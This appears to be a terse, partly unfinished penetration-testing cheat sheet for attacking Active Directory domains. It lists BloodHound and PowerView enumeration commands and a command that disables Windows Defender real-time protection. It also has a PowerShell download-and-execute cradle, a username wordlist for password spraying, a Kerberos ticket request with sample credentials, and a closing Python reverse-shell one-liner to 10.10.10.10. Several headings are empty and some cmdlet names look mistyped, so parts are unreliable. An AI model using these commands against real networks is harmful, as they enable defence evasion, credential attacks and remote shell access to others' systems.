INFASTRUCTURE

ACTIVE DIRECTORY

DOMAIN ENUMERATION

I do prefer to do manual enumeration but on large enterprice networks, some automated scan would come in handy to search for low hanging fruits

Automated Scanners AdPeas.ps1

You can aswell use BloodHound to visualize data

checklist check password policy gather usernam - Pray and Spray with CME

#For SharpHound.exe
./SharpHound.exe --CollectionMethod All

#For SharpHound.ps1
Invoke-BloodHound -ZipFileName ratloot -CollectionMethod All -Domain  rat.local

# Patch AMSI or disable AV

Getting hands dirty with PowerView

      Set-MpPreference -DisableRealTimeMonitoring -DisableAVIOProtection $true
      iex(New-Object System.Net.WebClient).downloadString('http:/x.x.x.x./PowerView_DeV.ps1')

# Domain & Controller Enumeration

Get-NetDomain 
            
Get-NetDomainController     

# User Enumeration

# Get all users present in the domain
Get-NetUsers | select cn

# Get users sorted with most logoncounts
Get-UserProperty -Properties logoncount | where logoncount | sort logoncount -Descending

# Get all the users in the domain and pipe their username to build a wordlist that could be used with crackmapexec later for spraying
Get-NetUsers | select samaccountname > username.txt

# Group Enumeration

# Get AD groups data either all or of a user
Get-NetGroup [-Domain <target>] [-FullData] [-GroupName "*admin*"] [-Username 'user_name']

# Get Members of a group
Get-NetGroupMember [-GroupName 'group_name'] [-Recurse]	

# Share Enumeration

# Find interesting shares
Invoke-ShareFinder -ExcludeStandard -ExcludeIPC -ExcludePrint	

# GPO Enumeration

# List all GPOs in the domain
Get-NetGPO [-ComputerName <rat.domain>]	

#Find Interesting GPO
Get-NetGPOGroup

# OU Enumeration

# Get all OU (Organisational Units) in the domain
Get-NetOU [-FullData]

# Get gplink of an OU to get GPOs applied to it
(Get-NetOU -Name 'test').gplink	

# Get GPO of a GPlink
Get-NetGPO -GPOName '{cadkfapsdfasdfaudvajkd}'

# Get GPO of an OU using gplink
((Get-NetOU -FullData <OU_NAME>).gplink -split "cn=" -split ",")[1] | Get-NetGPO

# ACL Enumeration

# Find interesting ACL
Invoke-ACLScanner -ResolveGUIDS	

# Find interesting ACL owned by a certain user :rat:
Invoke-ACLScanner -ResolveGUIDS | ?{$_.IdentityReference -match 'rat'}	

# Trust Enumeration

# Map all domain trust
Get-NetDomainTrust [-Domain <target>]

# Get all the domain of a forest
Get-NetForestDomain [-Forest <target>]	

# Hunting Users and Sessions

# Get list of all machines where current user has local admin access
Find-LocalAdminAccess	

# Invoke-EnumerateLocalAdmin	
Find all admins on all computers

# Find machines where a domain admin has a session, checkaccess tells you if you also have access to that machine
Invoke-UserHunter [-GroupName <group_name>] [-CheckAccess]	

# Get list of active sessions on a computer
Get-NetSession [-ComputerName <comp_name>]	

# Get list of Users logged-on on a system
Get-LoggedOnLocal [-ComputerName <comp_name>]	

Kerberos Attacks

# working from linux with creds

# username : rat
# password : r@tty419
# domain : rodent.local
impacket-getTGT rodent.local/rat:'r@tty419'


# now import the ticket into memory
export KRB5CCNAME=/tmp/rat.ccache

# confirm the ticket in memory 
klist

# working from windows with creds

# Using Rubeus

./Rubeus.exe asktgt 

RTF && SCF Weaponization

MITM6 IPV6 Attack

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'